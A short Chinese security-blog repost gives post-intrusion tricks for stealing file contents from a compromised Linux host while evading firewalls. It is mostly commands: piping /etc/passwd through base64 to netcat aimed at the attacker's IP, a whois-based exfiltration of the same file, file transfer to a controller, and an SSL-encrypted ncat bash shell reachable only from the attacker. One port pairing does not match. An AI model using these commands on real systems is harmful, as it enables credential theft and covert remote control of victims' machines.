nc加密盗取文件内容的小技巧

admin 2022年11月15日03:11:59安全文章评论9 views564字阅读1分52秒阅读模式

这里简单介绍一下,情况是这样

我们入侵Linux之后,植入nc后,想盗取部分内容无法直接传输,因为会遇到防火墙的拦截,这里就需要进行加密传输。

黑客端:

nc -l -p 8889 > kali.txt

受害端Linux系统:

cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1

nc加密盗取文件内容的小技巧

然后黑客端的nc目录下会生成一个kali.txt,里面存放了base64加密之后的passwd内容

传输文件:

控制端:

    nc -l -p 8889 > poc.py


被控端:

    nc -nv 10.0.79.241 8889 < ./poc.py -q 1

传输的文件接收的时候命名最好是一样的

文件基本不会被防火墙拦截

在两台都是Linux的情况下,目标机器无法上传nc,可以利用whois的命令来完成

黑客机器:

nc -l -v -p 8889 |sed "s/ //g" | base64 -d

目标机器:

 whois -h [黑客IP] -p 8889 `cat /etc/passwd | base64 `

两台都是linux,并且要加密通信

nc的加密版ncat

目标:

ncat -c bash --allow [黑客ip] -vnl 3333 --ssl 

只允许黑客的ip去控制它

黑客:

nc -nv [目标ip] 3333 --ssl

nc加密盗取文件内容的小技巧

这样我们的一个命令传输过程就是完全加密了的。


原文始发于微信公众号(白安全组):nc加密盗取文件内容的小技巧

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月15日03:11:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  nc加密盗取文件内容的小技巧 http://cn-sec.com/archives/1409258.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: